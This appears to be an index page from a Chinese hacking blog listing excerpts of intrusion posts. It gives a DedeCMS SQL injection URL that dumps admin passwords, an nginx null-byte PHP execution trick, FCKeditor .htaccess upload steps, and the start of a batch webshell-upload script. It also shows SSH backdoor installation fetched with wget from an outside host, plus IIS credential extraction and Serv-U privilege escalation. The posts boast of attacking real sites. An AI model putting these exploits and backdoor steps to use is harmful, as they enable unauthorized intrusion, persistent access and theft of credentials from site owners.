常见编辑器漏洞
常见的编辑器漏洞有: ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor 一:ewebeditor为例 1:默认下载下来的后台: https://www.webshell.cc/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard ...
nginx的旧版本可能执行任意代码0day
这个绝对是大0day哦。非常给力。测试了几个大站。全OK。哈哈。跟上一次那个漏洞有的一比哦。 Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问 webshell.jpg%00.php来执行其中的代码。影响版本:0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37。 请各位站长检查服务器版本,尽快升级...
YxShop 上传漏洞批量shell
这个是根据一篇文章来的思路 文章名字 好像叫做批量Getshell 一例吧 借用了里面在百度获取URL的代码!!自己写了上传shell的代码! php学的不是很好,大牛们看了就别踩了!! 这个主要是给大家批shell时拿来修改的! 这个是测试图 贴出来代码: <?php print_r(' [*] Getshell for Exploits [-] by : [email]cfking@...
记一次踩着别人的脚印入侵
话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点 哇!!这个站还真不少..72个,其实还是有好多没法打开.. 开始一...
ssh后门的设置与登入
ssh后门的设置与登入 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门: shell-# wgethttp://192.168.1.188/sshbd.tgz shell-# tar zxvf sshbd.tgz sh...
FCKeditor编辑器全部版本另类上传漏洞
利用步骤: 1.创建一个htaccess文件: 代码内容: SetHandler application/x-httpd-php 2.实用编辑器上传htaccess文件. https://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html https://www.webshell.cc/FCKeditor/editor/filem...
iis的几个vbs脚本在渗透中的应用
有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法 1.查询IIS里的所有网站 C:WINDOWSsystem32>cscript.exe iisweb.vbs /query Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有...
使用Adsutil.vbs脚本获取IIS配置信息及账号密码
今晚在搞https://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就...
提权杀器 serv-u and hway3.0
HWay && Serv-U.php 利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能. 如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击"获取Ser...
DedeCMS. 织梦科技注入爆管理员用户密码方法
搜索关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%...